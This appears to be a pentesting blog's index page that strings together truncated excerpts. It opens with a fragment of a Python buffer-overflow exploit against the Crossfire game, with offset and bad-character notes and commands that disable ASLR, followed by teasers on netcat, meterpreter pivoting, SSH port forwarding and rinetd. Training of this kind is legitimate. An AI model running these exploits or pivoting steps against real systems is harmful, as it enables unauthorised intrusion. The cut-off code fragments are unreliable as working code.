host = "127.0.0.1"
crash = "\x41" * 4379
buffer = "\x11(setup sound " + crash + "\x90\x00#"
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
print "[*]Sending evil buffer..."
This exploit takes advantage of a buffer overflow vulnerability during the
sound setup stage of the game Crossfire.
#total size = 4379
#offset = 4368
#bad chars = "\x00\x0a\x0d\x20"
#add eax, 12 = 83C00C
#jmp eax = FFE0
#creates a bi...
sudo bash -c 'echo "kernel.randomize_va_space = 0" >> /etc/sysctl.conf'
sudo sysctl -p
# verify "0"
ulimit -c unlimited
badchars = "\x00\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b" +
There are many distributions of Linux, and they all do things a little differently regarding default security and built-in tool sets, which means that when engaging these different flavors during a pentest, what works against one Linux target to get an interactive shell may not work against another. Well, not to worry my friends, there are many technique...
The amazing netcat, used for so many fantastic things. If you’re learning the basics of penetration testing, learn this tool inside out.
Connect to a TCP Port
nc -nv <IP Address> <Port>
Listen on a TCP Port
nc -lvp <port>
Connect and receive an HTTP page
nc -nv <IP Address> 80
HEAD / HTTP...
Once a meterpreter shell is obtained on a system, a larger range of options is available to the penetration tester for accessing the system. In a hypothetical scenario the victim is running a vulnerable mail server on port 25, and we have a remote exploit we wish to use against it. Unfortunately for us, it’s behind a firewall. After getting a meter...
Port forwarding can be one of the more confusing aspects of pivoting between machines and networks. Both remote and local SSH forwarding can be even more confusing in the sense that it matters who is initiating the connection and who the destination server is. I’ll run through local port forwarding here and, in a separate page, cover remote forwardin...
Port forwarding can be one of the more confusing aspects of pivoting between machines and networks. Both remote and local SSH forwarding can be even more confusing in the sense that it matters who is initiating the connection and who the destination server is. I’ll run through remote port forwarding here and, in a separate page, cover local forwardin...
SSH is fantastic for port redirection in a lot of cases, but what if you want to set up redirection of incoming and outgoing ports without the hassle of setting up SSH servers? Rinetd is a great program that will let you do this.
[Linux Download] http://www.boutell.com/rinetd/http/rinetd.tar.gz
[Windows Download] http://www...